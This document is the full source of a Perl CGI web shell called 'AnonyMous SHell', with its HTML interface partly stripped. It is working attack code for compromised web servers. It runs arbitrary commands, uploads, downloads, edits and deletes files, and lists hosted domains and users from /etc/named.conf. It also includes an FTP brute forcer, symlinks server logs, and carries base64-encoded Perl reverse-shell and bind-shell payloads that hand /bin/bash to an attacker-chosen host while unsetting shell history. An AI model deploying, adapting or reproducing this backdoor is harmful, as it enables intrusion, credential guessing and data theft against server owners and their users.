AnonyMous SHell

#!/usr/bin/perl -I/usr/local/bandmin use MIME::Base64; $Version= "CGI-Telnet Version 1.3"; $EditPersion="AnonyMous"; $Password = "anonymous"; # Change this. You will need to enter this to login. sub Is_Win(){ $os = &trim($ENV{"SERVER_SOFTWARE"}); if($os =~ m/win/i){ return 1; } else{ return 0; } } $WinNT = &Is_Win(); # You need to change the value of this to 1 if # you're running this script on a Windows NT # machine. If you're running it on Unix, you # can leave the value as it is. $NTCmdSep = "&"; # This character is used to seperate 2 commands # in a command line on Windows NT. $UnixCmdSep = ";"; # This character is used to seperate 2 commands # in a command line on Unix. $CommandTimeoutDuration = 10000; # Time in seconds after commands will be killed # Don't set this to a very large value. This is # useful for commands that may hang or that # take very long to execute, like "find /". # This is valid only on Unix servers. It is # ignored on NT Servers. $ShowDynamicOutput = 1; # If this is 1, then data is sent to the # browser as soon as it is output, otherwise # it is buffered and send when the command # completes. This is useful for commands like # ping, so that you can see the output as it # is being generated. # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !! $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep); $CmdPwd = ($WinNT ? "cd" : "pwd"); $PathSep = ($WinNT ? "\\" : "/"); $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1"); $cols= 150; $rows= 26; #------------------------------------------------------------------------------ # Reads the input sent by the browser and parses the input variables. It # parses GET, POST and multipart/form-data that is used for uploading files. # The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}. # Other variables can be accessed using $in{'var'}, where var is the name of # the variable. Note: Most of the code in this function is taken from other CGI # scripts. #------------------------------------------------------------------------------ sub ReadParse { local (*in) = @_ if @_; local ($i, $loc, $key, $val); $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/; if($ENV{'REQUEST_METHOD'} eq "GET") { $in = $ENV{'QUERY_STRING'}; } elsif($ENV{'REQUEST_METHOD'} eq "POST") { binmode(STDIN) if $MultipartFormData & $WinNT; read(STDIN, $in, $ENV{'CONTENT_LENGTH'}); } # handle file upload data if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/) { $Boundary = '--'.$1; # please refer to RFC1867 @list = split(/$Boundary/, $in); $HeaderBody = $list[1]; $HeaderBody =~ /\r\n\r\n|\n\n/; $Header = $`; $Body = $'; $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape $in{'filedata'} = $Body; $Header =~ /filename=\"(.+)\"/; $in{'f'} = $1; $in{'f'} =~ s/\"//g; $in{'f'} =~ s/\s//g; # parse trailer for($i=2; $list[$i]; $i++) { $list[$i] =~ s/^.+name=$//; $list[$i] =~ /\"(\w+)\"/; $key = $1; $val = $'; $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g; $val =~ s/%(..)/pack("c", hex($1))/ge; $in{$key} = $val; } } else # standard post data (url encoded, not multipart) { @in = split(/&/, $in); foreach $i (0 .. $#in) { $in[$i] =~ s/\+/ /g; ($key, $val) = split(/=/, $in[$i], 2); $key =~ s/%(..)/pack("c", hex($1))/ge; $val =~ s/%(..)/pack("c", hex($1))/ge; $in{$key} .= "\0" if (defined($in{$key})); $in{$key} .= $val; } } } #------------------------------------------------------------------------------ # Prints the HTML Page Header # Argument 1: Form item name to which focus should be set #------------------------------------------------------------------------------ sub PrintPageHeader { $EncodedCurrentDir = $CurrentDir; $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; my $dir =$CurrentDir; $dir=~ s/\\/\\\\/g; print "Content-type: text/html\n\n"; print < AnonyMous SHell $HtmlMetaHeader




	
		$EditPersion
	

	

		$ENV{"SERVER_SOFTWARE"}
	
	Server IP: $ENV{'SERVER_ADDR'} | Your IP: $ENV{'REMOTE_ADDR'}
	





Home | 
Command |
GUI | 
Upload File | 
Download File |

Back & Bind |
Brute Forcer |
Check Log |
Domains/Users |
Logout |
Help





END
}

#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{

	print <


AnonyMous SHell

Password : anonymous




 Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 


 Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

~\$ Connected ! 

$ServerName~ Checking Server . . . . . . . . . . . . . . . . . . . 


$ServerName~ Trying connect to Command . . . . . . . . . . .


$ServerName~\$ Connected Command! 

$ServerName~\$ OK! You can kill it!






END
}

#------------------------------------------------------------------------------
# Add html special chars
#------------------------------------------------------------------------------
sub HtmlSpecialChars($){
	my $text = shift;
	$text =~ s/&/&/g;
	$text =~ s/"/"/g;
	$text =~ s/'/'/g;
	$text =~ s//>/g;
	return $text;
}
#------------------------------------------------------------------------------
# Add link for directory
#------------------------------------------------------------------------------
sub AddLinkDir($)
{
	my $ac=shift;
	my @dir=();
	if($WinNT)
	{
		@dir=split(/\\/,$CurrentDir);
	}else
	{
		@dir=split("/",&trim($CurrentDir));
	}
	my $path="";
	my $result="";
	foreach (@dir)
	{
		$path .= $_.$PathSep;
		$result.="".$_.$PathSep."";
	}
	return $result;
}
#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
	print <Login : Administrator


Password:

Login incorrect


END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
	print <

Login : Administrator

Password:


END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
	print "

"; } #------------------------------------------------------------------------------ # Retreives the values of all cookies. The cookies can be accesses using the # variable $Cookies{'} #------------------------------------------------------------------------------ sub GetCookies { @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'}); foreach $cookie(@httpcookies) { ($id, $val) = split(/=/, $cookie); $Cookies{$id} = $val; } } #------------------------------------------------------------------------------ # Prints the screen when the user logs out #------------------------------------------------------------------------------ sub PrintLogoutScreen { print "Connection closed by foreign host.

"; } #------------------------------------------------------------------------------ # Logs out the user and allows the user to login again #------------------------------------------------------------------------------ sub PerformLogout { print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie &PrintPageHeader("p"); &PrintLogoutScreen; &PrintLoginScreen; &PrintLoginForm; &PrintPageFooter; exit; } #------------------------------------------------------------------------------ # This function is called to login the user. If the password matches, it # displays a page that allows the user to run commands. If the password doens't # match or if no password is entered, it displays a form that allows the user # to login #------------------------------------------------------------------------------ sub PerformLogin { if($LoginPassword eq $Password) # password matched { print "Set-Cookie: SAVEDPWD=$LoginPassword;\n"; &PrintPageHeader; print &ListDir; } else # password didn't match { &PrintPageHeader("p"); &PrintLoginScreen; if($LoginPassword ne "") # some password was entered { &PrintLoginFailedMessage; } &PrintLoginForm; &PrintPageFooter; exit; } } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to enter commands #------------------------------------------------------------------------------ sub PrintCommandLineInputForm { my $dir= "".&AddLinkDir("command").""; $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return < $Prompt END } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to download files #------------------------------------------------------------------------------ sub PrintFileDownloadForm { my $dir = &AddLinkDir("download"); $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return < $Prompt download

Filename:

Download: END } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to upload files #------------------------------------------------------------------------------ sub PrintFileUploadForm { my $dir= &AddLinkDir("upload"); $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return < $Prompt upload

Filename:

Options: Overwrite if it Exists

Upload: END } #------------------------------------------------------------------------------ # This function is called when the timeout for a command expires. We need to # terminate the script immediately. This function is valid only on Unix. It is # never called when the script is running on NT. #------------------------------------------------------------------------------ sub CommandTimeout { if(!$WinNT) { alarm(0); return <
Command exceeded maximum time of $CommandTimeoutDuration second(s).
Killed it! END } } #------------------------------------------------------------------------------ # This function displays the page that contains a link which allows the user # to download the specified file. The page also contains a auto-refresh # feature that starts the download automatically. # Argument 1: Fully qualified filename of the file to be downloaded #------------------------------------------------------------------------------ sub PrintDownloadLinkPage { local($FileUrl) = @_; my $result=""; if(-e $FileUrl) # if the file exists { # encode the file link so we can send it to the browser $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go"; $HtmlMetaHeader = ""; &PrintPageHeader("c"); $result .= < If the download does not start automatically, Click Here END $result .= &PrintCommandLineInputForm; } else # file doesn't exist { $result .= "Failed to download $FileUrl: $!"; $result .= &PrintFileDownloadForm; } return $result; } #------------------------------------------------------------------------------ # This function reads the specified file from the disk and sends it to the # browser, so that it can be downloaded by the user. # Argument 1: Fully qualified pathname of the file to be sent. #------------------------------------------------------------------------------ sub SendFileToBrowser { my $result = ""; local($SendFile) = @_; if(open(SENDFILE, $SendFile)) # file opened for reading { if($WinNT) { binmode(SENDFILE); binmode(STDOUT); } $FileSize = (stat($SendFile))[7]; ($Filename = $SendFile) =~ m!([^/^\\]*)$!; print "Content-Type: application/x-unknown\n"; print "Content-Length: $FileSize\n"; print "Content-Disposition: attachment; filename=$1\n\n"; print while(); close(SENDFILE); exit(1); } else # failed to open file { $result .= "Failed to download $SendFile: $!"; $result .=&PrintFileDownloadForm; } return $result; } #------------------------------------------------------------------------------ # This function is called when the user downloads a file. It displays a message # to the user and provides a link through which the file can be downloaded. # This function is also called when the user clicks on that link. In this case, # the file is read and sent to the browser. #------------------------------------------------------------------------------ sub BeginDownload { # get fully qualified path of the file to be downloaded if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute { $TargetFile = $TransferFile; } else # path is relative { chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; $TargetFile .= $PathSep.$TransferFile; } if($Options eq "go") # we have to send the file { &SendFileToBrowser($TargetFile); } else # we have to send only the link page { &PrintDownloadLinkPage($TargetFile); } } #------------------------------------------------------------------------------ # This function is called when the user wants to upload a file. If the # file is not specified, it displays a form allowing the user to specify a # file, otherwise it starts the upload process. #------------------------------------------------------------------------------ sub UploadFile { # if no file is specified, print the upload form again if($TransferFile eq "") { return &PrintFileUploadForm; } my $result=""; # start the uploading process $result .= "Uploading $TransferFile to $CurrentDir...
"; # get the fullly qualified pathname of the file to be created chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/; $TransferFile =~ m!([^/^\\]*)$!; $TargetName .= $PathSep.$1; $TargetFileSize = length($in{'filedata'}); # if the file exists and we are not supposed to overwrite it if(-e $TargetName && $Options ne "overwrite") { $result .= "Failed: Destination file already exists.
"; } else # file is not present { if(open(UPLOADFILE, ">$TargetName")) { binmode(UPLOADFILE) if $WinNT; print UPLOADFILE $in{'filedata'}; close(UPLOADFILE); $result .= "Transfered $TargetFileSize Bytes.
"; $result .= "File Path: $TargetName
"; } else { $result .= "Failed: $!
"; } } $result .= &PrintCommandLineInputForm; return $result; } #------------------------------------------------------------------------------ # This function is called when the user wants to download a file. If the # filename is not specified, it displays a form allowing the user to specify a # file, otherwise it displays a message to the user and provides a link # through which the file can be downloaded. #------------------------------------------------------------------------------ sub DownloadFile { # if no file is specified, print the download form again if($TransferFile eq "") { &PrintPageHeader("f"); return &PrintFileDownloadForm; } # get fully qualified path of the file to be downloaded if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute { $TargetFile = $TransferFile; } else # path is relative { chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; $TargetFile .= $PathSep.$TransferFile; } if($Options eq "go") # we have to send the file { return &SendFileToBrowser($TargetFile); } else # we have to send only the link page { return &PrintDownloadLinkPage($TargetFile); } } #------------------------------------------------------------------------------ # This function is called to execute commands. It displays the output of the # command and allows the user to enter another command. The change directory # command is handled differently. In this case, the new directory is stored in # an internal variable and is used each time a command has to be executed. The # output of the change directory command is not displayed to the users # therefore error messages cannot be displayed. #------------------------------------------------------------------------------ sub ExecuteCommand { my $result=""; if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command { # we change the directory internally. The output of the # command is not displayed. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd; chop($CurrentDir = `$Command`); $result .= &PrintCommandLineInputForm; $result .= "Command: $RunCommand
"; return $result; } #------------------------------------------------------------------------ # run command #------------------------------------------------------------------------ sub RunCmd { my $result=""; $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector; if(!$WinNT) { $SIG{'ALRM'} = \&CommandTimeout; alarm($CommandTimeoutDuration); } if($ShowDynamicOutput) # show output as it is generated { $|=1; $Command .= " |"; open(CommandOutput, $Command); while() { $_ =~ s/(\n|\r\n)$//; $result .= &HtmlSpecialChars("$_\n"); } $|=0; } else # show output after command completes { $result .= &HtmlSpecialChars('$Command'); } if(!$WinNT) { alarm(0); } return $result; } #============================================================================== # Form Save File #============================================================================== sub SaveFileForm { my $result =""; substr($RunCommand,0,5)=""; my $file=&trim($RunCommand); $save='
'; $File=$CurrentDir.$PathSep.$RunCommand; my $dir="".&AddLinkDir("gui").""; if(-w $File) { $rows="23" }else { $msg="
Permission denied!
"; $rows="20" } $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; $read=($WinNT)?"type":"less"; $RunCommand = "$read \"$RunCommand\""; $result .= < $Prompt
Command: $RunCommand $save
$msg
"; $result .= ""; return $result; } #============================================================================== # Save File #============================================================================== sub SaveFile($) { my $Data= shift ; my $File= shift; $File=$CurrentDir.$PathSep.$File; if(open(FILE, ">$File")) { binmode FILE; print FILE $Data; close FILE; return 1; }else { return 0; } } #------------------------------------------------------------------------------ # Brute Forcer Form #------------------------------------------------------------------------------ sub BruteForcerForm { my $result=""; $result .= < ####################################
Simple FTP brute forcer
#################################### END return $result; } #------------------------------------------------------------------------------ # Brute Forcer #------------------------------------------------------------------------------ sub BruteForcer { my $result=""; $Server=$ENV{'SERVER_ADDR'}; if($in{'user'} eq "") { $result .= &BruteForcerForm; }else { use Net::FTP; @user= split(/\n/, $in{'user'}); @pass= split(/\n/, $in{'pass'}); chomp(@user); chomp(@pass); $result .= "

[+] Trying brute $ServerName
====================>>>>>>>>>>>><<<<<<<<<<====================

\n"; foreach $username (@user) { if(!($username eq "")) { foreach $password (@pass) { $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n"; if($ftp->login("$username","$password")) { $result .= "[+] ftp://$username:$password\@$Server
\n"; $ftp->quit(); break; } if(!($in{'sleep'} eq "0")) { sleep(int($in{'sleep'})); } $ftp->quit(); } } } $result .= "\n
==========>>>>>>>>>> Finished <<<<<<<<<<==========
\n"; } return $result; } #------------------------------------------------------------------------------ # Backconnect Form #------------------------------------------------------------------------------ sub BackBindForm { return <

BackConnect:	Host: Port:
[+] Client listen before connect back! [+] Try check your Port with http://www.canyouseeme.org/ [+] Client listen with command: nc -vv -l -p 80

Bind Port:	Port: Password:
[+] Chuc nang chua dc test! [+] Try command: nc $ENV{'SERVER_ADDR'} 1412

END } #------------------------------------------------------------------------------ # Backconnect use perl #------------------------------------------------------------------------------ sub BackBind { use MIME::Base64; use Socket; $backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7"; $bindperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo="; $ClientAddr = $in{'clientaddr'}; $ClientPort = int($in{'clientport'}); if($ClientPort eq 0) { return &BackBindForm; }elsif(!$ClientAddr eq "") { $Data=decode_base64($backperl); if(-w "/tmp/") { $File="/tmp/backconnect.pl"; }else { $File=$CurrentDir.$PathSep."backconnect.pl"; } open(FILE, ">$File"); print FILE $Data; close FILE; system("perl backconnect.pl $ClientAddr $ClientPort"); unlink($File); exit 0; }else { $Data=decode_base64($bindperl); if(-w "/tmp") { $File="/tmp/bindport.pl"; }else { $File=$CurrentDir.$PathSep."bindport.pl"; } open(FILE, ">$File"); print FILE $Data; close FILE; system("perl bindport.pl $ClientPort"); unlink($File); exit 0; } } #------------------------------------------------------------------------------ # Array List Directory #------------------------------------------------------------------------------ sub RmDir($) { my $dir = shift; if(opendir(DIR,$dir)) { while($file = readdir(DIR)) { if(($file ne ".") && ($file ne "..")) { $file= $dir.$PathSep.$file; if(-d $file) { &RmDir($file); } else { unlink($file); } } } closedir(DIR); } if(!rmdir($dir)) { } } sub FileOwner($) { my $file = shift; if(-e $file) { ($uid,$gid) = (stat($file))[4,5]; if($WinNT) { return "???"; } else { $name=getpwuid($uid); $group=getgrgid($gid); return $name."/".$group; } } return "???"; } sub ParentFolder($) { my $path = shift; my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd; chop($path = `$Comm`); return $path; } sub FilePerms($) { my $file = shift; my $ur = "-"; my $uw = "-"; if(-e $file) { if($WinNT) { if(-r $file){ $ur = "r"; } if(-w $file){ $uw = "w"; } return $ur . " / " . $uw; }else { $mode=(stat($file))[2]; $result = sprintf("%04o", $mode & 07777); return $result; } } return "0000"; } sub FileLastModified($) { my $file = shift; if(-e $file) { ($la) = (stat($file))[9]; ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1]; $y = $y + 1900; @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/; $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i); return $lmtime; } return "???"; } sub FileSize($) { my $file = shift; if(-f $file) { return -s $file; } return "0"; } sub ParseFileSize($) { my $size = shift; if($size <= 1024) { return $size. " B"; } else { if($size <= 1024*1024) { $size = sprintf("%.02f",$size / 1024); return $size." KB"; } else { $size = sprintf("%.2f",$size / 1024 / 1024); return $size." MB"; } } } sub trim($) { my $string = shift; $string =~ s/^\s+//; $string =~ s/\s+$//; return $string; } sub AddSlashes($) { my $string = shift; $string=~ s/\\/\\\\/g; return $string; } sub ListDir { my $path = $CurrentDir.$PathSep; $path=~ s/\\\\/\\/g; my $result = ""; if(-d $path) { my @fname = (); my @dname = (); if(opendir(DIR,$path)) { while($file = readdir(DIR)) { $f=$path.$file; if(-d $f) { push(@dname,$file); } else { push(@fname,$file); } } closedir(DIR); } @fname = sort { lc($a) cmp lc($b) } @fname; @dname = sort { lc($a) cmp lc($b) } @dname; $result .= "

"; my $style="line"; my $i=0; foreach my $d (@dname) { $style= ($style eq "line") ? "notline": "line"; $d = &trim($d); $dirname=$d; if($d eq "..") { $d = &ParentFolder($path); } elsif($d eq ".") { $d = $path; } else { $d = $path.$d; } $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $i++; } foreach my $f (@fname) { $style= ($style eq "line") ? "notline": "line"; $file=$f; $f = $path.$f; $view = "?dir=".$path."&view=".$f; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $i++; } $result .= "

File Name	File Size	Owner	Permission	Last Modified	Action
[ ".$dirname." ]	DIR	".&FileOwner($d)."	".&FilePerms($d)."	".&FileLastModified($d)."	Rename \| Remove
".$file."	".&ParseFileSize(&FileSize($f))."	".&FileOwner($f)."	".&FilePerms($f)."	".&FileLastModified($f)."	Edit \| Rename \| Download \| Remove

"; } return $result; } #------------------------------------------------------------------------------ # Try to View List User #------------------------------------------------------------------------------ sub ViewDomainUser { open (domains, '/etc/named.conf') or $err=1; my @cnzs = ; close d0mains; my $style="line"; my $result="

Hoang Sa - Truong Sa

"; if ($err) { $result .= ('

C0uldn\'t Bypass it , Sorry

'); return $result; }else { $result .= ''; } foreach my $one (@cnzs) { if($one =~ m/.*?zone "(.*?)" {/) { $style= ($style eq "line") ? "notline": "line"; $filename= "/etc/valiases/".$one; $owner = getpwuid((stat($filename))[4]); $result .= ''; } } $result .= '

Domains	User
'.$one.'	'.$owner.'

'; return $result; } #------------------------------------------------------------------------------ # View Log #------------------------------------------------------------------------------ sub ViewLog { if($WinNT) { return "

Don't run on Windows

"; } my $result=""; my @pathlog=( '/usr/local/apache/logs/error_log', '/var/log/httpd/error_log', '/usr/local/apache/logs/access_log' ); my $i=0; my $perms; my $sl; foreach my $log (@pathlog) { if(-w $log) { $perms="OK"; }else { chop($sl = `ln -s $log error_log_$i`); if(&trim($ls) eq "") { if(-r $ls) { $perms="OK"; $log="error_log_".$i; } }else { $perms="Cancel"; } } $result .=< END $i++; } $result .="

Path Log	Submit
		$perms

"; return $result; } #------------------------------------------------------------------------------ # Main Program - Execution Starts Here #------------------------------------------------------------------------------ &ReadParse; &GetCookies; $ScriptLocation = $ENV{'SCRIPT_NAME'}; $ServerName = $ENV{'SERVER_NAME'}; $LoginPassword = $in{'p'}; $RunCommand = $in{'c'}; $TransferFile = $in{'f'}; $Options = $in{'o'}; $Action = $in{'a'}; $Action = "command" if($Action eq ""); # no action specified, use default # get the directory in which the commands will be executed $CurrentDir = &trim($in{'d'}); # mac dinh xuat thong tin neu ko co lenh nao! $RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq ""); chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq ""); $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password; if($Action eq "login" || !$LoggedIn) # user needs/has to login { &PerformLogin; }elsif($Action eq "gui") # GUI directory { &PrintPageHeader; if(!$WinNT) { $chmod=int($in{'chmod'}); if(!($chmod eq 0)) { $chmod=int($in{'chmod'}); $file=$CurrentDir.$PathSep.$TransferFile; chop($result= `chmod $chmod "$file"`); if(&trim($result) eq "") { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } } $rename=$in{'rename'}; if(!$rename eq "") { if(rename($TransferFile,$rename)) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } $remove=$in{'remove'}; if($remove ne "") { $rm = $CurrentDir.$PathSep.$remove; if(-d $rm) { &RmDir($rm); }else { if(unlink($rm)) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } } print &ListDir; } elsif($Action eq "command") # user wants to run a command { &PrintPageHeader("c"); print &ExecuteCommand; } elsif($Action eq "save") # user wants to save a file { &PrintPageHeader; if(&SaveFile($in{'data'},$in{'file'})) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } print &ListDir; } elsif($Action eq "upload") # user wants to upload a file { &PrintPageHeader; print &UploadFile; } elsif($Action eq "backbind") # user wants to back connect or bind port { &PrintPageHeader("clientport"); print &BackBind; } elsif($Action eq "bruteforcer") # user wants to brute force { &PrintPageHeader; print &BruteForcer; }elsif($Action eq "download") # user wants to download a file { print &DownloadFile; }elsif($Action eq "checklog") # user wants to view log file { &PrintPageHeader; print &ViewLog; }elsif($Action eq "domainsuser") # user wants to view list user/domain { &PrintPageHeader; print &ViewDomainUser; }elsif($Action eq "logout") # user wants to logout { &PerformLogout; } &PrintPageFooter;

$EditPersion	$ENV{"SERVER_SOFTWARE"}	Server IP: $ENV{'SERVER_ADDR'} \| Your IP: $ENV{'REMOTE_ADDR'}
	Home \| Command \| GUI \| Upload File \| Download File \| Back & Bind \| Brute Forcer \| Check Log \| Domains/Users \| Logout \| Help